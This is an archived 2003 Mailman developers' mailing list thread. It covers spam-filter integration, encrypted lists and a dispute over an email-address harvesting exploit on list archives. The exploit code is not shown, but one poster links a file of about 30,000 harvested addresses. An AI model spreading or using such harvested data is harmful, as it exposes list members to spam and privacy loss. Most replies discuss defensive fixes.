<1069878824.4190.36.camel@ron> References: <1069878824.4190.36.camel@ron> Message-ID: <20031127084723.GA55070@gewis.win.tue.nl> On Wed, Nov 26, 2003 at 04:33:45PM -0400, Jeff Warnica wrote: > First: If I was to submit a (compleate) set of patches that allow at > least some per list configuration for SpamAssassin integration, would > they be accepted? I hope those patches will be accepted! Also see my patch mentioned in http://www.mail-archive.com/mailman-developers@python.org/msg06837.html It would be great if the MM 2.1.4 distribution will contain the files needed for spamassassin integration. It can be disabled by default, and some docs should be added of how to install it (or should it only be mentioned in the Mailan FAQ?). I think mailman/sa integration should be considered in two places: Enabling/disabling SA-integration and settings scores ===================================================== I think Privacy Options | Spam Filters should have three more options: Use SpamAssassin headers: yes/no SpamAssassin Hold score: (default 5) SpamAssassin Discard score: (default 10) If the scores are left empty, the default score of the mailman-list should be used. Moderating messages =================== Integrating moderation of spam messages that are holded in 'admindb'. Jeff wrote: > Likely it would be hard coded at 3 possible actions > discard, hold for moderation, or pass through, as I cant think that > anyone would want to bounce spam. I don't understand this. There are currently four options in 'admindb' moderation: defer/approve/reject/discard. It might the best to have a fifth option if spam assassin integration is enabled on the list: "discard spam". That would make it possible to integrate spam bayes learning or spam reporting on those messages (i can imaging that bouncing spam to a spamtrap is usefull in some setups as well). On the other hand it might be confusing for moderators to have two 'discard' options, and I doubt if many non-spam messages are discarded by moderators. Thoughts? I'm willing to help you with the SA-integration. I didn't hear Barry's opinion on integrating SpamAssassin and mailman. Regards, Pieter -- http://zwiki.org/PieterB From barry at python.org Thu Nov 27 10:46:27 2003 From: barry at python.org (Barry Warsaw) Date: Thu Nov 27 10:46:33 2003 Subject: [Mailman-Developers] GUI hacking for SA integration In-Reply-To: <20031127084723.GA55070@gewis.win.tue.nl> References: <1069878824.4190.36.camel@ron> <20031127084723.GA55070@gewis.win.tue.nl> Message-ID: <1069947987.8426.6.camel@anthem> On Thu, 2003-11-27 at 03:47, PieterB wrote: > It would be great if the MM 2.1.4 distribution will contain the > files needed for spamassassin integration. We can't really add this to 2.1 because it would be a new feature. > I'm willing to help you with the SA-integration. I didn't hear > Barry's opinion on integrating SpamAssassin and mailman. For the next version of Mailman, I'd prefer to see something more generic if possible. That way a site could add SA, SB[1], or some other system. It may be too hard to do this since there are no standards here, but even then, I'd like to see something pluggable rather than tightly integrated. -Barry [1] I have a Spambayes patch on SF and I think Simone was working on that. I've been using the latest SB with my Evolution client and have been very impressed, although it does take a little bit of training. From darsie at gmx.at Tue Nov 25 14:13:49 2003 From: darsie at gmx.at (Bernhard Kuemel) Date: Thu Nov 27 11:34:40 2003 Subject: [Mailman-Developers] bugtraq submission warning: email address harvesting exploit References: <0CB08353-1F79-11D8-9F07-000393A481EE@chgr.mc.vanderbilt.edu> Message-ID: <3FC3A9ED.3090605@gmx.at> Doug Selph wrote: > > On Tuesday, Nov 25, 2003, at 11:46 US/Central, Bernhard Kuemel wrote: > >> If you think the problem is worth fixing please estimate how long it >> will take and I will wait a reasonable time for a fix before I post >> the problem and the exploit code to bugtraq. Otherwise I will post to >> bugtraq in about 1 week. >> >> Here is the exploit code: > > It seems, Bernard, that you may as well have posted it to bugtraq > immediately, since your posting of the code to this list will likely > make the exploit code accessible via a google search for "mailman > exploit" within a matter of hours... Well, it's a different thing being told about something or having to look for it without even knowing that it exists. But if you are worried, feel free to remove the exploit from the archive. I guess you know how to do that. Bernhard -- Webspace; Low end Serverhousing ab 15 e, etc.: http://www.bksys.at Linux Admin/Programmierer: http://bksys.at/bernhard/services.html From darsie at gmx.at Tue Nov 25 15:06:43 2003 From: darsie at gmx.at (Bernhard Kuemel) Date: Thu Nov 27 11:34:45 2003 Subject: [Mailman-Developers] bugtraq submission warning: email address harvesting exploit References: <3FB78C1A.5080702@gmx.at> <20031121003627.GJ9121@dust.uchicago.edu> <3FC39580.2020605@gmx.at> <20276EA2-1F78-11D8-8CA9-000A957C9A50@openinfo.co.uk> Message-ID: <3FC3B653.9060608@gmx.at> Richard Barrett wrote: > >> Since your answer is the only one and the problem does not appear to >> be addressed sufficiently I wrote an example exploit program that >> finds mailman lists and harvests their email addresses. After about >> 20 minutes it collected about 30.000 email addresses: >> http://bksys.at/bernhard/30,000%20email%20addresses.gz > > I am just a spectator but this doesn't look like a major contribution > to the Open Source movement by you. You are right. It is a small contribution. I also filed a PHP bug today. Another small contribution. Makes 2 today. But not all days are as productive as this one. > As a way of getting your code and ideas adopted it is one hell of an > approach. Well, I'm not sure if a graphical turing test makes up for the drawbacks I mentioned so I'm not sure it will make it to mailman. But I'm glad that the email harvesting problem get's some attention now. > A better approach might be to work up a patch for the current Mailman > release that will demonstrably function in practice (how are we going > to manage all those images your original "Turing test" proposal will > lead to) and submit that like any other contributor. It would probably be more efficient if some who are familiar with the mailman code fixed its "security flaws". Also we first need to find out what should be done about it. A graphical turing test may rule out users of non graphical web browsers and maybe we can come up with something bettter. Implementing it prematurely might be a waste of human resources. > You can program in Perl so using Python should be a snap for a clever fellow like you. Maybe. However, I don't like python as on our old P60 server it burned up so much CPU time (15 s/min). I can also program in C so I could probably fix the PHP bug as well. However, I do not always feel like doing everything, especially if the others don't like it. > But I confess if it were for me to decide on a response to your threats, I was looking for a better word than 'warning', however, none of the alternatives seemed to fit. Also I tried to make my announcement of my bugtraq post as little offensive as possible. If you are a native english speaker maybe you can show me an even better way. > which it is not, I'd say sex and travel fits the bill. Well, well, if you prefer some hints about sex over my bug reports maybe we should change the forum. About travelling, if you want you can join next European Rainbow gathering, my every year summer highlight. See my rainbow website for details: http://rainbow.bksys.at . >> Have a nice day, > > There's irony for you. That was not meant ironically. Hmm, maybe 'cheers' would have been less ambigous, but only '(kind) regards' came to my mind at that time and that sounded too formal to me. Other suggestions? Cheers, Bernhard -- Webspace; Low end Serverhousing ab 15 e, etc.: http://www.bksys.at Linux Admin/Programmierer: http://bksys.at/bernhard/services.html From darsie at gmx.at Wed Nov 26 05:36:23 2003 From: darsie at gmx.at (Bernhard Kuemel) Date: Thu Nov 27 11:34:47 2003 Subject: [Mailman-Developers] bugtraq submission warning: email address harvesting exploit References: <3FB78C1A.5080702@gmx.at> <20031121003627.GJ9121@dust.uchicago.edu> <3FC39580.2020605@gmx.at> <20276EA2-1F78-11D8-8CA9-000A957C9A50@openinfo.co.uk> <3FC3B653.9060608@gmx.at> <7A7514A4-1F91-11D8-8CA9-000A957C9A50@openinfo.co.uk> Message-ID: <3FC48227.5030503@gmx.at> Richard Barrett wrote: >> Maybe. However, I don't like python as on our old P60 server it burned >> up so much CPU time (15 s/min). > > It would be interesting to see you present convincing evidence that > Python runs slower than Perl which you seem happy to rely on. That can be difficult as different programming languages are designed for different tasks so they all have their strengths and weaknesses. That also pretty much makes such a comparison senseless. It would e.g. be a good choice to make an mp3 encoder in C and my mailman exploit in perl and not the other way round. I would without doubt claim that C runs faster and many tasks are coded quicker in perl. It is my impression that python is slow, at least it has a lengthy startup. It may still be suitable for certain tasks, however I have no idea which as I don't speak python. Mailman was run once per minute from cron on my old server. Maybe Mailman was coded inefficiently. However, I read it scales better than Majordomo, a perl program. That difference is probably a design issue rather than to blame on the programming language. Anyways, since you asked for a benchmark, here is a quick start. These programs were run repeatedly so the perl interpreter was already loaded from disk and cached. The shortest run was picked to minimize interference from other processes. Detected 735.005 MHz processor. Calibrating delay loop... 1468.00 BogoMIPS CPU: Intel Celeron (Coppermine) stepping 06 bernhard@b:~/t$ time perl -e 'print "hello world\n";' hello world real 0m0.017s user 0m0.000s sys 0m0.010s This shows the small overhead on perl startup. bernhard@b:~/t$ time perl -e 'for ($i=1;$i<=1000000;$i++) {print "$i: hello world\n";}' >/dev/null real 0m2.147s user 0m2.090s sys 0m0.010s A million string interpolations and file accesses in 2.1 s - not bad. Compare this to C: int main(void) { puts("hello world"); } bernhard@b:~/src/benchmark$ time ./hello hello world real 0m0.007s user 0m0.000s sys 0m0.000s #include int main(void) { int i; for (i=1;i<=1000000;i++) { printf("%d: hello world/n",i); } } //main bernhard@b:~/src/benchmark$ time ./1Mhello >/dev/null real 0m1.007s user 0m0.960s sys 0m0.010s Give some examples for python. I'll run them on my machine if you don't have a campareble one. Sure, this benchmark sucks, but it's not completely bogus. Any ideas about some more serious benchmarks? Going towards the strengths of each language would be somehow unfair, so a rather complex problem may be best but also difficult to implement. OTOH picking the language that offers the most advantages for a given problem is the way to go. > Maybe dilettante springs to mind as a description that fits. Your insults are getting boring. Bernhard -- Webspace; Low end Serverhousing ab 15 e, etc.: http://www.bksys.at Linux Admin/Programmierer: http://bksys.at/bernhard/services.html From darsie at gmx.at Wed Nov 26 05:47:33 2003 From: darsie at gmx.at (Bernhard Kuemel) Date: Thu Nov 27 11:34:51 2003 Subject: [Mailman-Developers] bugtraq submission warning: email address harvesting exploit References: <3FB78C1A.5080702@gmx.at> <20031121003627.GJ9121@dust.uchicago.edu> <3FC39580.2020605@gmx.at> <20276EA2-1F78-11D8-8CA9-000A957C9A50@openinfo.co.uk> <3FC3B653.9060608@gmx.at> <7A7514A4-1F91-11D8-8CA9-000A957C9A50@openinfo.co.uk> <3FC48227.5030503@gmx.at> Message-ID: <3FC484C5.8010500@gmx.at> Bernhard Kuemel wrote: > A million string interpolations and file accesses in 2.1 s - not bad. Hmm, maybe the startup overhead of python is still significant with 1,000,000 iterations so here are 10,000,000 timings: bernhard@b:~/src/benchmark$ time perl -e 'for ($i=1;$i<=10000000;$i++) {print "$i: hello world\n";}' >/dev/null real 0m21.400s user 0m21.130s sys 0m0.030s bernhard@b:~/src/benchmark$ time ./10Mhello >/dev/null real 0m9.932s user 0m9.760s sys 0m0.020s -- Webspace; Low end Serverhousing ab 15 e, etc.: http://www.bksys.at Linux Admin/Programmierer: http://bksys.at/bernhard/services.html From dietmar at maurer-it.com Thu Nov 27 10:49:58 2003 From: dietmar at maurer-it.com (Dietmar Maurer) Date: Thu Nov 27 11:34:53 2003 Subject: [Mailman-Developers] Secure Mailing Lists Message-ID: <87844F3B84E88E4EA0CD476EA3B9F71D24D5C1@himalaya.maurer-it.com> Hi all, we are looking for a solution to implement secure mailing lists. We need the following behaviour: 1.) A secure mailing list has an assiciated PGP Key. 2.) postings to the list are encrypted with the public key of the list. 3.) The list server decrypts the message, and then, for each list member, encrypts the message with the public key of the list member and sends that mail. That way the whole traffic is encrypted. Does somebody know a solution for that problem? Is there already such extension for mailman? If not, how long would it take to implement such thing? - Dietmar --------------------------------------------------- Dietmar Maurer Maurer IT Systeml?sungen KEG Technischer Leiter Kohlgasse 51/9 Tel: +43 1 545 449 712 A - 1050 WIEN Fax: +43 1 545 449 722 Mobil: +43 699 105 88 032 dietmar@maurer-it.com http://www.maurer-it.com --------------------------------------------------- From simone.piunno at wseurope.com Thu Nov 27 11:24:34 2003 From: simone.piunno at wseurope.com (Simone Piunno) Date: Thu Nov 27 11:34:55 2003 Subject: [Mailman-Developers] GUI hacking for SA integration In-Reply-To: <1069947987.8426.6.camel@anthem> References: <1069878824.4190.36.camel@ron> <20031127084723.GA55070@gewis.win.tue.nl> <1069947987.8426.6.camel@anthem> Message-ID: <200311271724.34303.simone.piunno@wseurope.com> Alle 16:46, gioved? 27 novembre 2003, Barry Warsaw ha scritto: > For the next version of Mailman, I'd prefer to see something more > generic if possible. That way a site could add SA, SB[1], or some other > system. It may be too hard to do this since there are no standards > here, but even then, I'd like to see something pluggable rather than > tightly integrated. I'd be happy to help coding this pluggable filter, but I'd need your help in the interface design. I believe the biggest problems are: - how do you plan to weight different filters? (e.g. using coefficients instead of a rigid pipeline, first-match-wins) - how to plug UI? I'd like also to have a per-list FIFO queue of pristine copies of all messages received, with a configurable max-size, so that when a message is mis-categorized as either good or spam (not unsure) we have a chance to train on the pristine version (not decorated, not header-cooked, not scrubbed, and so on) through the admin interface. Use case A: 1. Spammer sends a message to the list 2. Message gets mis-categorized as good and forwarded to the list, but a pristine copy is held in a special queue. 3. Admin notices the problem and opens the admin UI within a reasonble time 4. Admin can recover the pristine copy of that message from the special queue (selecting from a list of still-queued messages, or better by pasting some id copied from the message header as received from the list) 5. Admin can train one or all the filters on that pristine copy Use case B: 1. Subscriber sends a message to the list 2. Message gets mis-categorized as spam and not sent to the list nor kept in the moderation queue, but a pristine copy is held in a special queue. 3. Admin is notified of the problem (by angry Subscriber) and opens the admin UI within a reasonble time 4. Admin can recover the pristine copy of that message from the special queue, selecting from a list of still-queued messages (no message header is available because the message was not forwarded) 5. Admin can train one or all the filters on that pristine copy and/or force re-processing of this message so that subscribers will receive it. Use case C: 1. Someone sends a message to the list 2. Message gets categorized as unsure and held in the moderation queue, a pristine copy is held in a special queue anyway. 3. Admin is notified of the problem (by Mailman) and opens the admin UI within a reasonble time 4. Admin can see the message in the moderation queue and decide what to do, including training on one or all the filters. Use case D: Messages was categorized correctly or admin didn't try to react within the allowed timeframe, so the pristine copy is silently deleted from the special queue. > I've been using the latest SB with my Evolution client and have > been very impressed, although it does take a little bit of training. For focused traffic (such as on a list) training on 50 good and 50 spam is enough for > 99.9% success. At least this is my experience. -- Simone Piunno, chief architect Wireless Solutions SPA - DADA group Europe HQ, via Castiglione 25 Bologna web:www.wseurope.com tel:+390512966811 fax:+390512966800 God is real, unless declared integer From claw at kanga.nu Thu Nov 27 11:42:54 2003 From: claw at kanga.nu (J C Lawrence) Date: Thu Nov 27 11:43:00 2003 Subject: [Mailman-Developers] GUI hacking for SA integration In-Reply-To: Message from Barry Warsaw of "Thu, 27 Nov 2003 10:46:27 EST." <1069947987.8426.6.camel@anthem> References: <1069878824.4190.36.camel@ron> <20031127084723.GA55070@gewis.win.tue.nl> <1069947987.8426.6.camel@anthem> Message-ID: <12573.1069951374@kanga.nu> On Thu, 27 Nov 2003 10:46:27 -0500 Barry Warsaw wrote: > On Thu, 2003-11-27 at 03:47, PieterB wrote: > For the next version of Mailman, I'd prefer to see something more > generic if possible. +1 > That way a site could add SA, SB[1], or some other system. It may be > too hard to do this since there are no standards here, but even then, > I'd like to see something pluggable rather than tightly integrated. First thought: Discard message on Hold message on Accept message on Where the regex fields are in fact lists of regexes. Given such support it is fairly simple to define regexes which match SpamAssassin headers of value X and above/below for the relevant entries, or SpamBayes or whatever. -- J C Lawrence ---------(*) Satan, oscillate my metallic sonatas. claw@kanga.nu He lived as a devil, eh? http://www.kanga.nu/~claw/ Evil is a name of a foeman, as I live. From terri at zone12.com Thu Nov 27 12:08:24 2003 From: terri at zone12.com (Terri Oda) Date: Thu Nov 27 12:06:13 2003 Subject: [Mailman-Developers] bugtraq submission warning: email address harvesting exploit In-Reply-To: References: <3FB78C1A.5080702@gmx.at> <20031121003627.GJ9121@dust.uchicago.edu> <3FC39580.2020605@gmx.at> <1069783232.1069.21.camel@geddy> <3FC3A001.5020006@gmx.at> <1069787024.1069.25.camel@geddy> Message-ID: <20031127170823.GA705@ostraya.zone12.com> On Tue, Nov 25, 2003 at 11:07:39AM -0800, Chuq Von Rospach wrote: > Fails ADA and accessibility requirements badly. I'd argue against any > solution that fails such basic needs without any real way to fix it. What about reverse turing tests that aren't graphics-based? It's easier to beat "What is the sum of three and fifteen?" or "what is the name of this mailing list?" text-tests than the more complex RTTs, but it would make exploit code that much harder to write without sacrificing users who can't, for example, view graphics or hear sounds. > Better is to simply teach the archives not to distribute sensitive > information at all. And a lot easier to implement, actually. So, is anyone working on this *within* pipermail? I know there are great alternative archivers out there, but Mailman still winds up with a bad reputation if the default isn't very secure. Maybe for 2.2 we could have a "completely obscure archived email addresses" option which changed them all to user@xxxxxx. From claw at kanga.nu Thu Nov 27 12:09:17 2003 From: claw at kanga.nu (J C Lawrence) Date: Thu Nov 27 12:09:21 2003 Subject: [Mailman-Developers] Secure Mailing Lists In-Reply-To: Message from "Dietmar Maurer" of "Thu, 27 Nov 2003 16:49:58 +0100." <87844F3B84E88E4EA0CD476EA3B9F71D24D5C1@himalaya.maurer-it.com> References: <87844F3B84E88E4EA0CD476EA3B9F71D24D5C1@himalaya.maurer-it.com> Message-ID: <14647.1069952957@kanga.nu> On Thu, 27 Nov 2003 16:49:58 +0100 Dietmar Maurer wrote: > Hi all, we are looking for a solution to implement secure mailing > lists. We need the following behaviour: Architecturally it can be accomplished at either the MLM or MTA level without enourmous difficulty. The problems arise when you start confronting the PKI issues, the human usability issues, and the server-side performance issues. There are no "right" answers to any of them. This is explored and surprisingly non-trivial territory. http://www.raphinou.com/smailman/smailman.html http://sourceforge.net/projects/mmreencrypt/ http://www.synacklabs.net/projects/crypt-ml/ http://www.atnf.csiro.au/people/rgooch/PGPsendmail.html http://shibboleth.sourceforge.net/ -- J C Lawrence ---------(*) Satan, oscillate my metallic sonatas. claw@kanga.nu He lived as a devil, eh? http://www.kanga.nu/~claw/ Evil is a name of a foeman, as I live. From claw at kanga.nu Thu Nov 27 12:11:45 2003 From: claw at kanga.nu (J C Lawrence) Date: Thu Nov 27 12:11:51 2003 Subject: [Mailman-Developers] bugtraq submission warning: email address harvesting exploit In-Reply-To: Message from Terri Oda of "Thu, 27 Nov 2003 12:08:24 EST." <20031127170823.GA705@ostraya.zone12.com> References: <3FB78C1A.5080702@gmx.at> <20031121003627.GJ9121@dust.uchicago.edu> <3FC39580.2020605@gmx.at> <1069783232.1069.21.camel@geddy> <3FC3A001.5020006@gmx.at> <1069787024.1069.25.camel@geddy> <20031127170823.GA705@ostraya.zone12.com> Message-ID: <14830.1069953105@kanga.nu> On Thu, 27 Nov 2003 12:08:24 -0500 Terri Oda wrote: > On Tue, Nov 25, 2003 at 11:07:39AM -0800, Chuq Von Rospach wrote: > I know there are great alternative archivers out there, but Mailman > still winds up with a bad reputation if the default isn't very secure. Disagreed. > Maybe for 2.2 we could have a "completely obscure archived email > addresses" option which changed them all to user@xxxxxx. Another option, and the one I advocate, is to replace all email addresses with TMDA-style dated addresses, much in the manner GMane does. -- J C Lawrence ---------(*) Satan, oscillate my metallic sonatas. claw@kanga.nu He lived as a devil, eh? http://www.kanga.nu/~claw/ Evil is a name of a foeman, as I live. From chuqui at plaidworks.com Thu Nov 27 12:17:33 2003 From: chuqui at plaidworks.com (Chuq Von Rospach) Date: Thu Nov 27 12:18:35 2003 Subject: [Mailman-Developers] bugtraq submission warning: email address harvesting exploit In-Reply-To: <20031127170823.GA705@ostraya.zone12.com> References: <3FB78C1A.5080702@gmx.at> <20031121003627.GJ9121@dust.uchicago.edu> <3FC39580.2020605@gmx.at> <1069783232.1069.21.camel@geddy> <3FC3A001.5020006@gmx.at> <1069787024.1069.25.camel@geddy> <20031127170823.GA705@ostraya.zone12.com> Message-ID: <96CA2A64-20FD-11D8-A9D7-0003934516A8@plaidworks.com> On Nov 27, 2003, at 9:08 AM, Terri Oda wrote: > On Tue, Nov 25, 2003 at 11:07:39AM -0800, Chuq Von Rospach wrote: >> Fails ADA and accessibility requirements badly. I'd argue against any >> solution that fails such basic needs without any real way to fix it. > > What about reverse turing tests that aren't graphics-based? if it can be made accessible, I have no problem with it. But I think it's solving the wrong problem, because the data is still accessible to a motivated person. you're not fixing the issue, simply raising the bar and hoping they give up. It won't stop the spammer who hires a dozen temps to surf web sites and authenticate their bots through, right? So the REAL answer, IMHO, is to not make that information available. Cloak it programattically. If you want to have an authenticated mode for subscribers to keep it uncloaked, that's fine by me. But the public archives should simply recognize significant pieces of information and elide them from the output. That way, no matter what a spammer or other nasty person does, they can't get the information. It's not there. my definition of significant pieces of information: email addresses, phone numbers, social security nubmers (and if there are global equivalents to this US number, those, too). Simply replace them in the text with [[email address omitted]] as you deliver the archive. Then you stop playing this arms war with spambots completely, by removing the target they're after. No need to, two years from now, rip out the work you did and come up with a new temporary fix because spammers got around to implementing new OCR techniques. Remember challenge/response? When everyone thought it was the solution to all of our problems? Took the spammers under six weeks to crack it once they decided to try. (answer: send spam as being "From:" you, "To:" you. Most C/R systems have the user's email address whitelisted. end of story. >> Better is to simply teach the archives not to distribute sensitive >> information at all. And a lot easier to implement, actually. > > So, is anyone working on this *within* pipermail? that would be the answer, or throw it out (I'm not a huge fan of pipermail; it's only advantage to mailman is it's written in Python) and do something else. Or leave pipermail alone, and write a CGI that all archives exit through that does the filtering, which is IMHO, how you ought to do it. That way, you can authenticate via that CGI to a level of access, change the filtering on the fly, and leave the archives unedited (as I think they ought to be). From claw at kanga.nu Thu Nov 27 12:23:32 2003 From: claw at kanga.nu (J C Lawrence) Date: Thu Nov 27 12:23:37 2003 Subject: [Mailman-Developers] bugtraq submission warning: email address harvesting exploit In-Reply-To: Message from Chuq Von Rospach of "Thu, 27 Nov 2003 09:17:33 PST." <96CA2A64-20FD-11D8-A9D7-0003934516A8@plaidworks.com> References: <3FB78C1A.5080702@gmx.at> <20031121003627.GJ9121@dust.uchicago.edu> <3FC39580.2020605@gmx.at> <1069783232.1069.21.camel@geddy> <3FC3A001.5020006@gmx.at> <1069787024.1069.25.camel@geddy> <20031127170823.GA705@ostraya.zone12.com> <96CA2A64-20FD-11D8-A9D7-0003934516A8@plaidworks.com> Message-ID: <15878.1069953812@kanga.nu> On Thu, 27 Nov 2003 09:17:33 -0800 Chuq Von Rospach wrote: > On Nov 27, 2003, at 9:08 AM, Terri Oda wrote: >> On Tue, Nov 25, 2003 at 11:07:39AM -0800, Chuq Von Rospach wrote: > Remember challenge/response? When everyone thought it was the solution > to all of our problems? Took the spammers under six weeks to crack it > once they decided to try. (answer: send spam as being "From:" you, > "To:" you. Most C/R systems have the user's email address > whitelisted. end of story. Hehn, the first thing I did was to blacklist myself and every role address I had. > Or leave pipermail alone, and write a CGI that all archives exit > through that does the filtering, which is IMHO, how you ought to do > it. +1 > That way, you can authenticate via that CGI to a level of access, > change the filtering on the fly, and leave the archives unedited (as I > think they ought to be). +1 -- J C Lawrence ---------(*) Satan, oscillate my metallic sonatas. claw@kanga.nu He lived as a devil, eh? http://www.kanga.nu/~claw/ Evil is a name of a foeman, as I live. From terri at zone12.com Thu Nov 27 12:52:15 2003 From: terri at zone12.com (Terri Oda) Date: Thu Nov 27 12:51:45 2003 Subject: [Mailman-Developers] bugtraq submission warning: email address harvesting exploit In-Reply-To: <96CA2A64-20FD-11D8-A9D7-0003934516A8@plaidworks.com> References: <3FB78C1A.5080702@gmx.at> <20031121003627.GJ9121@dust.uchicago.edu> <3FC39580.2020605@gmx.at> <1069783232.1069.21.camel@geddy> <3FC3A001.5020006@gmx.at> <1069787024.1069.25.camel@geddy> <20031127170823.GA705@ostraya.zone12.com> <96CA2A64-20FD-11D8-A9D7-0003934516A8@plaidworks.com> Message-ID: <20031127175214.GB705@ostraya.zone12.com> On Thu, Nov 27, 2003 at 09:17:33AM -0800, Chuq Von Rospach wrote: > if it can be made accessible, I have no problem with it. But I think > it's solving the wrong problem, because the data is still accessible to > a motivated person. you're not fixing the issue, simply raising the bar > and hoping they give up. It won't stop the spammer who hires a dozen > temps to surf web sites and authenticate their bots through, right? Of course. We should remember that *that's* the reason not to do turing tests. Incidentally, I don't advocate their use either --I think a CGI address-eater as Chuq describes is probably is the way to go, and given more time I'd even write it-- but I wanted to make sure they weren't dismissed out of hand for technical reasons. Terri From barry at python.org Thu Nov 27 13:12:30 2003 From: barry at python.org (Barry Warsaw) Date: Thu Nov 27 13:12:37 2003 Subject: [Mailman-Developers] Secure Mailing Lists In-Reply-To: <87844F3B84E88E4EA0CD476EA3B9F71D24D5C1@himalaya.maurer-it.com> References: <87844F3B84E88E4EA0CD476EA3B9F71D24D5C1@himalaya.maurer-it.com> Message-ID: <1069956750.8426.43.camel@anthem> On Thu, 2003-11-27 at 10:49, Dietmar Maurer wrote: > Hi all, > > we are looking for a solution to implement secure mailing lists. We need the following behaviour: > > 1.) A secure mailing list has an assiciated PGP Key. > 2.) postings to the list are encrypted with the public key of the list. > 3.) The list server decrypts the message, and then, for each list member, encrypts the message with the public key of the list member and sends that mail. > > That way the whole traffic is encrypted. > > Does somebody know a solution for that problem? Is there already such extension for mailman? If not, how long would it take to implement such thing? It's not there, but I don't think it would be too hard. Here's a sketch of a simple first take: - Add an interface to MemberAdapter.py to set a user's public key. Add an implementation to OldStyleMemberAdapter.py to store the key somewhere (e.g. in a dictionary on the MailList object). - Add u/i goo to surface the public key setting in the member's option page. Probably as an upload box or a text box for pasting. - Add a module to Mailman/Gui for generating and setting the list's key pair. I'm guessing there's going to be no password on the private key otherwise the Mailman daemon process can't really decrypt the message. To get the pubkey, I'd either publish it on the listinfo page, or maybe add an email command to retrieve it. The latter would go in Mailman/Commands/do_getkey.py or some such. - Obviously you're going to do personalized deliveries, so for any such list you'll probably want to disable digests. You'll need to hack Mailman/Handlers/SMTPDirect.py's verpdeliver() function do to the encryption for each recipient. I'd probably do this part differently depending on whether I wanted this feature for all lists at your site, or just a few. If the former, I'd probably just rewrite SMTPDirect.py to do the specific handling you're interested in, call it something different, and then set DELIVERY_MODULE in mm_cfg.py. Those are just some ideas to get you started. -Barry From barry at python.org Thu Nov 27 13:23:38 2003 From: barry at python.org (Barry Warsaw) Date: Thu Nov 27 13:23:43 2003 Subject: [Mailman-Developers] bugtraq submission warning: email address harvesting exploit In-Reply-To: <20031127170823.GA705@ostraya.zone12.com> References: <3FB78C1A.5080702@gmx.at> <20031121003627.GJ9121@dust.uchicago.edu> <3FC39580.2020605@gmx.at> <1069783232.1069.21.camel@geddy> <3FC3A001.5020006@gmx.at> <1069787024.1069.25.camel@geddy> <20031127170823.GA705@ostraya.zone12.com> Message-ID: <1069957417.8426.47.camel@anthem> On Thu, 2003-11-27 at 12:08, Terri Oda wrote: > > Better is to simply teach the archives not to distribute sensitive > > information at all. And a lot easier to implement, actually. > > So, is anyone working on this *within* pipermail? I know there are great > alternative archivers out there, but Mailman still winds up with a bad > reputation if the default isn't very secure. Maybe for 2.2 we could have a > "completely obscure archived email addresses" option which changed them all > to user@xxxxxx. No one's working on it AFAIK, but I agree that this is the right approach. I'm not sure how to go about this within the Mailman 2.1 series though, because currently only the private archives are accessed programmatically. That may be a good first step though -- add the obscuring stuff to the private archive cgi and then if that works out well, provide a way to make a public archive vend through the private archive cgi (one way: enable private archives with no password). It's still arguably a new feature, but perhaps we could sneak it in as a bug fix. -Barry From barry at python.org Thu Nov 27 13:25:35 2003 From: barry at python.org (Barry Warsaw) Date: Thu Nov 27 13:25:42 2003 Subject: [Mailman-Developers] bugtraq submission warning: email address harvesting exploit In-Reply-To: <96CA2A64-20FD-11D8-A9D7-0003934516A8@plaidworks.com> References: <3FB78C1A.5080702@gmx.at> <20031121003627.GJ9121@dust.uchicago.edu> <3FC39580.2020605@gmx.at> <1069783232.1069.21.camel@geddy> <3FC3A001.5020006@gmx.at> <1069787024.1069.25.camel@geddy> <20031127170823.GA705@ostraya.zone12.com> <96CA2A64-20FD-11D8-A9D7-0003934516A8@plaidworks.com> Message-ID: <1069957532.8426.49.camel@anthem> On Thu, 2003-11-27 at 12:17, Chuq Von Rospach wrote: > that would be the answer, or throw it out (I'm not a huge fan of > pipermail; it's only advantage to mailman is it's written in Python) > and do something else. Or leave pipermail alone, and write a CGI that > all archives exit through that does the filtering, which is IMHO, how > you ought to do it. That way, you can authenticate via that CGI to a > level of access, change the filtering on the fly, and leave the > archives unedited (as I think they ought to be). +1 Volunteers? -Barry From barry at python.org Thu Nov 27 13:28:25 2003 From: barry at python.org (Barry Warsaw) Date: Thu Nov 27 13:28:32 2003 Subject: [Mailman-Developers] bugtraq submission warning: email address harvesting exploit In-Reply-To: <3FC3B653.9060608@gmx.at> References: <3FB78C1A.5080702@gmx.at> <20031121003627.GJ9121@dust.uchicago.edu> <3FC39580.2020605@gmx.at> <20276EA2-1F78-11D8-8CA9-000A957C9A50@openinfo.co.uk> <3FC3B653.9060608@gmx.at> Message-ID: <1069957704.8426.52.camel@anthem> On Tue, 2003-11-25 at 15:06, Bernhard Kuemel wrote: > It would probably be more efficient if some who are familiar with > the mailman code fixed its "security flaws". Just to be snitty and pedantic, I don't consider email address leaks in Pipermail to be security flaws. Not that I don't consider them serious enough to address (I do), but it's a different class of problem than some exploit that could be used to subvert the Mailman system or the machine it's running on. -Barry From barry at python.org Thu Nov 27 13:32:10 2003 From: barry at python.org (Barry Warsaw) Date: Thu Nov 27 13:32:17 2003 Subject: [Mailman-Developers] bugtraq submission warning: email address harvesting exploit In-Reply-To: <3FC48227.5030503@gmx.at> References: <3FB78C1A.5080702@gmx.at> <20031121003627.GJ9121@dust.uchicago.edu> <3FC39580.2020605@gmx.at> <20276EA2-1F78-11D8-8CA9-000A957C9A50@openinfo.co.uk> <3FC3B653.9060608@gmx.at> <7A7514A4-1F91-11D8-8CA9-000A957C9A50@openinfo.co.uk> <3FC48227.5030503@gmx.at> Message-ID: <1069957929.8426.57.camel@anthem> On Wed, 2003-11-26 at 05:36, Bernhard Kuemel wrote: > It is my impression that python is slow, at least it has a > lengthy startup. It may still be suitable for certain tasks, > however I have no idea which as I don't speak python. Mailman was > run once per minute from cron on my old server. Maybe Mailman was > coded inefficiently. However, I read it scales better than > Majordomo, a perl program. That difference is probably a design > issue rather than to blame on the programming language. We don't need to get into lengthy language wars here, but I submit that there's no practical difference in performance between Python and Perl, especially in the problem domain that Mailman addresses. Anyone who wants to recode Mailman in C, Java, ML, Haskell, Smalltalk, Objective-C, C++, Perl, Ruby or whatever has my blessing (just don't call it Mailman :). see-you-in-10-years-ly y'rs, -Barry From jeffw at chebucto.ns.ca Thu Nov 27 13:34:42 2003 From: jeffw at chebucto.ns.ca (Jeff Warnica) Date: Thu Nov 27 13:33:03 2003 Subject: [Mailman-Developers] GUI hacking for SA integration In-Reply-To: <20031127084723.GA55070@gewis.win.tue.nl> References: <1069878824.4190.36.camel@ron> <20031127084723.GA55070@gewis.win.tue.nl> Message-ID: <1069958082.14780.14.camel@ron> Im not what you could consiter a power user as far as Mailman is concerned, but it is my understanding that there is more then one way for messages to get into the 'admindb' (if 